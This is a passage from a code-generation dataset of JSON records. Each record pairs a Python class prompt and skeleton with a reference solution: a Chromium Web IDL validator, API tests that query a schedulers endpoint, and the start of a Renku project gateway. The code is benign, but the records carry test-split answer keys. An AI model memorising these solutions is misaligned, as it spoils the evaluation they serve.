__init__(self, web_idl_database)"}, {"docstring": "Validates `_web_idl_database` follows the rules stored in `rule_store`. Args: rule_store: A RuleStore which holds rules. report_error: A function to handle a detected error. It takes a Rule object, a target object, a debug_info, and an error_message. Returns: The number of validation errors.", "name": "execute", "signature": "def execute(self, rule_store, report_error)"}], "n_methods": 2, "prompt": "Implement the Python class `Validator` described below.\n\nClass description:\nProvides an API to Check if each IDL file follows rules defined in Web IDL by validating an instance of web_idl.Database.\n\nMethod signatures and docstrings:\n- def __init__(self, web_idl_database): Instantiates with web_idl.Database.\n- def execute(self, rule_store, report_error): Validates `_web_idl_database` follows the rules stored in `rule_store`. Args: rule_store: A RuleStore which holds rules. report_error: A function to handle a detected error. It takes a Rule object, a target object, a debug_info, and an error_message. 
Returns: The number of validation errors.", "prompted_full_text": "Implement the Python class `Validator` described below.\n\nClass description:\nProvides an API to Check if each IDL file follows rules defined in Web IDL by validating an instance of web_idl.Database.\n\nMethod signatures and docstrings:\n- def __init__(self, web_idl_database): Instantiates with web_idl.Database.\n- def execute(self, rule_store, report_error): Validates `_web_idl_database` follows the rules stored in `rule_store`. Args: rule_store: A RuleStore which holds rules. report_error: A function to handle a detected error. It takes a Rule object, a target object, a debug_info, and an error_message. Returns: The number of validation errors.\n\n<|skeleton|>\nclass Validator:\n \"\"\"Provides an API to Check if each IDL file follows rules defined in Web IDL by validating an instance of web_idl.Database.\"\"\"\n\n def __init__(self, web_idl_database):\n \"\"\"Instantiates with web_idl.Database.\"\"\"\n <|body_0|>\n\n def execute(self, rule_store, report_error):\n \"\"\"Validates `_web_idl_database` follows the rules stored in `rule_store`. Args: rule_store: A RuleStore which holds rules. report_error: A function to handle a detected error. It takes a Rule object, a target object, a debug_info, and an error_message. Returns: The number of validation errors.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n assert isinstance(web_idl_database, web_idl.Database)\n self._web_idl_database = web_idl_database\n self._target_store = TargetStore(web_idl_database)\n<|end_body_0|>\n\n<|body_start_1|>\n assert isinstance(rule_store, RuleStore)\n rule = None\n target_type = None\n target_object = None\n\n def assert_(condition, text, *args, **kwargs):\n if not condition:\n error_message = text.format(*args, **kwargs)\n report_error(rule=rule, target=target_object, target_type=target_type, error_message=error_message)\n for target_type in rule_store.all_target_types:\n rules = rule_store.get_rules(target_type)\n target_objects = self._target_store.get(target_type)\n for target_object in target_objects:\n for rule in rules:\n assert isinstance(rule, RuleBase)\n rule.validate(assert_, target_object)\n<|end_body_1|>\n", "revision_id": "a401d6cf4f7bf0e2d2e964c512ebb923c3d8832c", "skeleton": "<|skeleton|>\nclass Validator:\n \"\"\"Provides an API to Check if each IDL file follows rules defined in Web IDL by validating an instance of web_idl.Database.\"\"\"\n\n def __init__(self, web_idl_database):\n \"\"\"Instantiates with web_idl.Database.\"\"\"\n <|body_0|>\n\n def execute(self, rule_store, report_error):\n \"\"\"Validates `_web_idl_database` follows the rules stored in `rule_store`. Args: rule_store: A RuleStore which holds rules. report_error: A function to handle a detected error. It takes a Rule object, a target object, a debug_info, and an error_message. 
Returns: The number of validation errors.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Validator:\n \"\"\"Provides an API to Check if each IDL file follows rules defined in Web IDL by validating an instance of web_idl.Database.\"\"\"\n\n def __init__(self, web_idl_database):\n \"\"\"Instantiates with web_idl.Database.\"\"\"\n assert isinstance(web_idl_database, web_idl.Database)\n self._web_idl_database = web_idl_database\n self._target_store = TargetStore(web_idl_database)\n\n def execute(self, rule_store, report_error):\n \"\"\"Validates `_web_idl_database` follows the rules stored in `rule_store`. Args: rule_store: A RuleStore which holds rules. report_error: A function to handle a detected error. It takes a Rule object, a target object, a debug_info, and an error_message. Returns: The number of validation errors.\"\"\"\n assert isinstance(rule_store, RuleStore)\n rule = None\n target_type = None\n target_object = None\n\n def assert_(condition, text, *args, **kwargs):\n if not condition:\n error_message = text.format(*args, **kwargs)\n report_error(rule=rule, target=target_object, target_type=target_type, error_message=error_message)\n for target_type in rule_store.all_target_types:\n rules = rule_store.get_rules(target_type)\n target_objects = self._target_store.get(target_type)\n for target_object in target_objects:\n for rule in rules:\n assert isinstance(rule, RuleBase)\n rule.validate(assert_, target_object)\n", "source": "the_stack_v2_python_sparse", "source_path": "third_party/blink/renderer/bindings/scripts/validator/framework/validator.py", "source_repo": "chromium/chromium", "split": "test", "star_events_count": 17408} {"blob_id": "706e065d5a7f1fe0b5b92beff9432613340340a9", "bodies": ["keyword = '%student%'\ndata = {'fieldList': [{'fieldName': 'name', 'fieldValue': keyword, 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\nfieldValue = data['fieldList'][0]['fieldValue'][1:-1]\nres = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\nquery_results = dict_res(res.text)\nself.assertEqual(res.status_code, 200, '查询失败')\nquery_results = dict_res(query_results['content'][0])\nquery_result_name = query_results['name']\nself.assertIn(fieldValue, query_result_name, '查询结果中scheduler的name和查询关键词name不一致')", "data = {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'dataflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\nfieldValue = data['fieldList'][0]['fieldValue']\nres = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\nquery_results = dict_res(res.text)\nquery_results = dict_res(query_results['content'][0])\nquery_result_flowType = query_results['flowType']\nself.assertEqual(res.status_code, 200, '查询失败')\nself.assertEqual(fieldValue, query_result_flowType, '查询结果中scheduler关联flowtype和查询关键词flowType不一致')", "data = {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'workflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\nfieldValue = data['fieldList'][0]['fieldValue']\nres = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\nself.assertEqual(res.status_code, 200, '查询失败')", "data 
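The Validator record's `execute` body hinges on a closure, `assert_`, that captures the loop variables `rule`, `target_type`, and `target_object` so each rule can report rich errors without threading that context through its own signature. A minimal sketch of the same late-binding pattern outside Blink (the `run_rules` and `non_empty` names are illustrative):

def run_rules(rules_by_type, targets_by_type, report_error):
    """Apply each rule to each target; failed checks call report_error."""
    rule = None
    target_type = None
    target = None

    def assert_(condition, text, *args, **kwargs):
        # Late binding: reads whichever rule/target the loops hold
        # at the moment a rule calls assert_.
        if not condition:
            report_error(rule=rule, target=target, target_type=target_type,
                         error_message=text.format(*args, **kwargs))

    for target_type, rules in rules_by_type.items():
        for target in targets_by_type.get(target_type, []):
            for rule in rules:
                rule(assert_, target)


# Usage: one rule over string targets.
def non_empty(assert_, target):
    assert_(len(target) > 0, 'target {!r} must be non-empty', target)

errors = []
run_rules({'name': [non_empty]},
          {'name': ['ok', '']},
          lambda **kw: errors.append(kw['error_message']))
print(errors)  # ["target '' must be non-empty"]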
= {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'streamflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\nfieldValue = data['fieldList'][0]['fieldValue']\nres = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\nquery_results = dict_res(res.text)\nself.assertEqual(res.status_code, 200, '查询失败')", "data = {'fieldList': [{'fieldName': 'name', 'fieldValue': '%gbj%', 'comparatorOperator': 'LIKE'}, {'fieldName': 'flowType', 'fieldValue': 'workflow', 'comparatorOperator': 'EQUAL'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\ndata_name = data['fieldList'][0]['fieldValue'][1:-1]\ndata_flowType = data['fieldList'][1]['fieldValue']\nres = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\nself.assertEqual(200, res.status_code, 'flowtype+name组合查询scheduler失败:%s' % res.text)", "end_time = get_time()\nstart_time = get_time() - 10 * 24 * 3600 * 1000\ndata = {'fieldList': [{'fieldName': 'lastModifiedTime', 'fieldValue': start_time, 'comparatorOperator': 'GREATER_THAN'}, {'fieldName': 'lastModifiedTime', 'fieldValue': end_time, 'comparatorOperator': 'LESS_THAN'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\nres = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\nquery_results = dict_res(res.text)\nfirst_Time = query_results['content'][0]['lastModifiedTime']\nself.assertEqual(end_time > first_Time > start_time, True, '查询结果的lastModifiedTime不包含在起始时间内,查询结果不正确')"], "bodies_text": "<|body_start_0|>\n keyword = '%student%'\n data = {'fieldList': [{'fieldName': 'name', 'fieldValue': keyword, 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue'][1:-1]\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n self.assertEqual(res.status_code, 200, '查询失败')\n query_results = dict_res(query_results['content'][0])\n query_result_name = query_results['name']\n self.assertIn(fieldValue, query_result_name, '查询结果中scheduler的name和查询关键词name不一致')\n<|end_body_0|>\n\n<|body_start_1|>\n data = {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'dataflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n query_results = dict_res(query_results['content'][0])\n query_result_flowType = query_results['flowType']\n self.assertEqual(res.status_code, 200, '查询失败')\n self.assertEqual(fieldValue, query_result_flowType, '查询结果中scheduler关联flowtype和查询关键词flowType不一致')\n<|end_body_1|>\n\n<|body_start_2|>\n data = {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'workflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n self.assertEqual(res.status_code, 200, 
'查询失败')\n<|end_body_2|>\n\n<|body_start_3|>\n data = {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'streamflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n self.assertEqual(res.status_code, 200, '查询失败')\n<|end_body_3|>\n\n<|body_start_4|>\n data = {'fieldList': [{'fieldName': 'name', 'fieldValue': '%gbj%', 'comparatorOperator': 'LIKE'}, {'fieldName': 'flowType', 'fieldValue': 'workflow', 'comparatorOperator': 'EQUAL'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n data_name = data['fieldList'][0]['fieldValue'][1:-1]\n data_flowType = data['fieldList'][1]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n self.assertEqual(200, res.status_code, 'flowtype+name组合查询scheduler失败:%s' % res.text)\n<|end_body_4|>\n\n<|body_start_5|>\n end_time = get_time()\n start_time = get_time() - 10 * 24 * 3600 * 1000\n data = {'fieldList': [{'fieldName': 'lastModifiedTime', 'fieldValue': start_time, 'comparatorOperator': 'GREATER_THAN'}, {'fieldName': 'lastModifiedTime', 'fieldValue': end_time, 'comparatorOperator': 'LESS_THAN'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n first_Time = query_results['content'][0]['lastModifiedTime']\n self.assertEqual(end_time > first_Time > start_time, True, '查询结果的lastModifiedTime不包含在起始时间内,查询结果不正确')\n<|end_body_5|>\n", "class_docstring": "测试查询schedulers接口 /api/schedulers/query", "class_name": "QuerySchedulers", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass QuerySchedulers:\n \"\"\"测试查询schedulers接口 /api/schedulers/query\"\"\"\n\n def test_case01(self):\n \"\"\"根据scheduler name模糊查询\"\"\"\n <|body_0|>\n\n def test_case02(self):\n \"\"\"根据flowtype-dataflow查询\"\"\"\n <|body_1|>\n\n def test_case03(self):\n \"\"\"根据flowtype-workflow查询\"\"\"\n <|body_2|>\n\n def test_case04(self):\n \"\"\"根据flowtype-streamflow查询\"\"\"\n <|body_3|>\n\n def test_case05(self):\n \"\"\"flowtype+name组合查询scheduler\"\"\"\n <|body_4|>\n\n def test_case06(self):\n \"\"\"query:根据上次修改时间查询全部的scheduler\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n keyword = '%student%'\n data = {'fieldList': [{'fieldName': 'name', 'fieldValue': keyword, 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue'][1:-1]\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n self.assertEqual(res.status_code, 200, '查询失败')\n query_results = dict_res(query_results['content'][0])\n query_result_name = query_results['name']\n self.assertIn(fieldValue, query_result_name, '查询结果中scheduler的name和查询关键词name不一致')\n<|end_body_0|>\n\n<|body_start_1|>\n data = {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'dataflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue 
= data['fieldList'][0]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n query_results = dict_res(query_results['content'][0])\n query_result_flowType = query_results['flowType']\n self.assertEqual(res.status_code, 200, '查询失败')\n self.assertEqual(fieldValue, query_result_flowType, '查询结果中scheduler关联flowtype和查询关键词flowType不一致')\n<|end_body_1|>\n\n<|body_start_2|>\n data = {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'workflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n self.assertEqual(res.status_code, 200, '查询失败')\n<|end_body_2|>\n\n<|body_start_3|>\n data = {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'streamflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n self.assertEqual(res.status_code, 200, '查询失败')\n<|end_body_3|>\n\n<|body_start_4|>\n data = {'fieldList': [{'fieldName': 'name', 'fieldValue': '%gbj%', 'comparatorOperator': 'LIKE'}, {'fieldName': 'flowType', 'fieldValue': 'workflow', 'comparatorOperator': 'EQUAL'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n data_name = data['fieldList'][0]['fieldValue'][1:-1]\n data_flowType = data['fieldList'][1]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n self.assertEqual(200, res.status_code, 'flowtype+name组合查询scheduler失败:%s' % res.text)\n<|end_body_4|>\n\n<|body_start_5|>\n end_time = get_time()\n start_time = get_time() - 10 * 24 * 3600 * 1000\n data = {'fieldList': [{'fieldName': 'lastModifiedTime', 'fieldValue': start_time, 'comparatorOperator': 'GREATER_THAN'}, {'fieldName': 'lastModifiedTime', 'fieldValue': end_time, 'comparatorOperator': 'LESS_THAN'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n first_Time = query_results['content'][0]['lastModifiedTime']\n self.assertEqual(end_time > first_Time > start_time, True, '查询结果的lastModifiedTime不包含在起始时间内,查询结果不正确')\n<|end_body_5|>\n", "id": "stack_v2_sparse_classes_10k_test_000487", "length_bytes": 15511, "license_type": "no_license", "methods": [{"docstring": "根据scheduler name模糊查询", "name": "test_case01", "signature": "def test_case01(self)"}, {"docstring": "根据flowtype-dataflow查询", "name": "test_case02", "signature": "def test_case02(self)"}, {"docstring": "根据flowtype-workflow查询", "name": "test_case03", "signature": "def test_case03(self)"}, {"docstring": "根据flowtype-streamflow查询", "name": "test_case04", "signature": "def test_case04(self)"}, {"docstring": "flowtype+name组合查询scheduler", "name": "test_case05", "signature": "def test_case05(self)"}, {"docstring": "query:根据上次修改时间查询全部的scheduler", "name": "test_case06", "signature": "def test_case06(self)"}], "n_methods": 6, "original_id": "stack_v2_sparse_classes_30k_train_001251", "prompt": 
"Implement the Python class `QuerySchedulers` described below.\n\nClass description:\n测试查询schedulers接口 /api/schedulers/query\n\nMethod signatures and docstrings:\n- def test_case01(self): 根据scheduler name模糊查询\n- def test_case02(self): 根据flowtype-dataflow查询\n- def test_case03(self): 根据flowtype-workflow查询\n- def test_case04(self): 根据flowtype-streamflow查询\n- def test_case05(self): flowtype+name组合查询scheduler\n- def test_case06(self): query:根据上次修改时间查询全部的scheduler", "prompted_full_text": "Implement the Python class `QuerySchedulers` described below.\n\nClass description:\n测试查询schedulers接口 /api/schedulers/query\n\nMethod signatures and docstrings:\n- def test_case01(self): 根据scheduler name模糊查询\n- def test_case02(self): 根据flowtype-dataflow查询\n- def test_case03(self): 根据flowtype-workflow查询\n- def test_case04(self): 根据flowtype-streamflow查询\n- def test_case05(self): flowtype+name组合查询scheduler\n- def test_case06(self): query:根据上次修改时间查询全部的scheduler\n\n<|skeleton|>\nclass QuerySchedulers:\n \"\"\"测试查询schedulers接口 /api/schedulers/query\"\"\"\n\n def test_case01(self):\n \"\"\"根据scheduler name模糊查询\"\"\"\n <|body_0|>\n\n def test_case02(self):\n \"\"\"根据flowtype-dataflow查询\"\"\"\n <|body_1|>\n\n def test_case03(self):\n \"\"\"根据flowtype-workflow查询\"\"\"\n <|body_2|>\n\n def test_case04(self):\n \"\"\"根据flowtype-streamflow查询\"\"\"\n <|body_3|>\n\n def test_case05(self):\n \"\"\"flowtype+name组合查询scheduler\"\"\"\n <|body_4|>\n\n def test_case06(self):\n \"\"\"query:根据上次修改时间查询全部的scheduler\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n keyword = '%student%'\n data = {'fieldList': [{'fieldName': 'name', 'fieldValue': keyword, 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue'][1:-1]\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n self.assertEqual(res.status_code, 200, '查询失败')\n query_results = dict_res(query_results['content'][0])\n query_result_name = query_results['name']\n self.assertIn(fieldValue, query_result_name, '查询结果中scheduler的name和查询关键词name不一致')\n<|end_body_0|>\n\n<|body_start_1|>\n data = {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'dataflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n query_results = dict_res(query_results['content'][0])\n query_result_flowType = query_results['flowType']\n self.assertEqual(res.status_code, 200, '查询失败')\n self.assertEqual(fieldValue, query_result_flowType, '查询结果中scheduler关联flowtype和查询关键词flowType不一致')\n<|end_body_1|>\n\n<|body_start_2|>\n data = {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'workflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n self.assertEqual(res.status_code, 200, '查询失败')\n<|end_body_2|>\n\n<|body_start_3|>\n data = {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'streamflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 
'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n self.assertEqual(res.status_code, 200, '查询失败')\n<|end_body_3|>\n\n<|body_start_4|>\n data = {'fieldList': [{'fieldName': 'name', 'fieldValue': '%gbj%', 'comparatorOperator': 'LIKE'}, {'fieldName': 'flowType', 'fieldValue': 'workflow', 'comparatorOperator': 'EQUAL'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n data_name = data['fieldList'][0]['fieldValue'][1:-1]\n data_flowType = data['fieldList'][1]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n self.assertEqual(200, res.status_code, 'flowtype+name组合查询scheduler失败:%s' % res.text)\n<|end_body_4|>\n\n<|body_start_5|>\n end_time = get_time()\n start_time = get_time() - 10 * 24 * 3600 * 1000\n data = {'fieldList': [{'fieldName': 'lastModifiedTime', 'fieldValue': start_time, 'comparatorOperator': 'GREATER_THAN'}, {'fieldName': 'lastModifiedTime', 'fieldValue': end_time, 'comparatorOperator': 'LESS_THAN'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n first_Time = query_results['content'][0]['lastModifiedTime']\n self.assertEqual(end_time > first_Time > start_time, True, '查询结果的lastModifiedTime不包含在起始时间内,查询结果不正确')\n<|end_body_5|>\n", "revision_id": "fc41513af3063169ff1b17d6f01f7074057ceb1f", "skeleton": "<|skeleton|>\nclass QuerySchedulers:\n \"\"\"测试查询schedulers接口 /api/schedulers/query\"\"\"\n\n def test_case01(self):\n \"\"\"根据scheduler name模糊查询\"\"\"\n <|body_0|>\n\n def test_case02(self):\n \"\"\"根据flowtype-dataflow查询\"\"\"\n <|body_1|>\n\n def test_case03(self):\n \"\"\"根据flowtype-workflow查询\"\"\"\n <|body_2|>\n\n def test_case04(self):\n \"\"\"根据flowtype-streamflow查询\"\"\"\n <|body_3|>\n\n def test_case05(self):\n \"\"\"flowtype+name组合查询scheduler\"\"\"\n <|body_4|>\n\n def test_case06(self):\n \"\"\"query:根据上次修改时间查询全部的scheduler\"\"\"\n <|body_5|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class QuerySchedulers:\n \"\"\"测试查询schedulers接口 /api/schedulers/query\"\"\"\n\n def test_case01(self):\n \"\"\"根据scheduler name模糊查询\"\"\"\n keyword = '%student%'\n data = {'fieldList': [{'fieldName': 'name', 'fieldValue': keyword, 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue'][1:-1]\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n self.assertEqual(res.status_code, 200, '查询失败')\n query_results = dict_res(query_results['content'][0])\n query_result_name = query_results['name']\n self.assertIn(fieldValue, query_result_name, '查询结果中scheduler的name和查询关键词name不一致')\n\n def test_case02(self):\n \"\"\"根据flowtype-dataflow查询\"\"\"\n data = {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'dataflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue']\n res = 
requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n query_results = dict_res(query_results['content'][0])\n query_result_flowType = query_results['flowType']\n self.assertEqual(res.status_code, 200, '查询失败')\n self.assertEqual(fieldValue, query_result_flowType, '查询结果中scheduler关联flowtype和查询关键词flowType不一致')\n\n def test_case03(self):\n \"\"\"根据flowtype-workflow查询\"\"\"\n data = {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'workflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n self.assertEqual(res.status_code, 200, '查询失败')\n\n def test_case04(self):\n \"\"\"根据flowtype-streamflow查询\"\"\"\n data = {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'streamflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n self.assertEqual(res.status_code, 200, '查询失败')\n\n def test_case05(self):\n \"\"\"flowtype+name组合查询scheduler\"\"\"\n data = {'fieldList': [{'fieldName': 'name', 'fieldValue': '%gbj%', 'comparatorOperator': 'LIKE'}, {'fieldName': 'flowType', 'fieldValue': 'workflow', 'comparatorOperator': 'EQUAL'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n data_name = data['fieldList'][0]['fieldValue'][1:-1]\n data_flowType = data['fieldList'][1]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n self.assertEqual(200, res.status_code, 'flowtype+name组合查询scheduler失败:%s' % res.text)\n\n def test_case06(self):\n \"\"\"query:根据上次修改时间查询全部的scheduler\"\"\"\n end_time = get_time()\n start_time = get_time() - 10 * 24 * 3600 * 1000\n data = {'fieldList': [{'fieldName': 'lastModifiedTime', 'fieldValue': start_time, 'comparatorOperator': 'GREATER_THAN'}, {'fieldName': 'lastModifiedTime', 'fieldValue': end_time, 'comparatorOperator': 'LESS_THAN'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n first_Time = query_results['content'][0]['lastModifiedTime']\n self.assertEqual(end_time > first_Time > start_time, True, '查询结果的lastModifiedTime不包含在起始时间内,查询结果不正确')\n", "source": "the_stack_v2_python_sparse", "source_path": "singl_api/api_test_cases/cases_for_schedulers_api.py", "source_repo": "bingjiegu/For_API", "split": "test", "star_events_count": 0} {"blob_id": "5621d7acec37e57b04f8a59d9ed31e2759fe722e", "bodies": ["try:\n return self.database_dispatcher.current_database['project']\nexcept KeyError as e:\n raise ValueError() from e", "from renku import __version__\ndatabase = self.database_dispatcher.current_database\ntry:\n if database['project']:\n database.remove_root_object('project')\nexcept KeyError:\n pass\nproject.agent_version = __version__\ndatabase.add_root_object('project', project)"], "bodies_text": "<|body_start_0|>\n try:\n return self.database_dispatcher.current_database['project']\n except 
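Every QuerySchedulers case above builds the same POST payload shape: a `fieldList` of (fieldName, fieldValue, comparatorOperator) triples plus a `sortObject` and paging fields. (The record's docstrings and assertion messages are Chinese; the class docstring means "test the schedulers query endpoint /api/schedulers/query" and '查询失败' reads "query failed".) A small helper makes that construction less repetitive — a sketch only, with the endpoint URL, `get_headers`, and host left as placeholders for the suite's fixtures:

import json


def build_query(field_triples, sort_field='lastModifiedTime',
                direction='DESC', offset=0, limit=8):
    """Assemble the fieldList/sortObject payload shared by every case."""
    return {
        'fieldList': [
            {'fieldName': n, 'fieldValue': v, 'comparatorOperator': op}
            for n, v, op in field_triples
        ],
        'sortObject': {'field': sort_field, 'orderDirection': direction},
        'offset': offset,
        'limit': limit,
    }


# The name + flowType combination from test_case05, reduced to one call.
payload = build_query([('name', '%gbj%', 'LIKE'),
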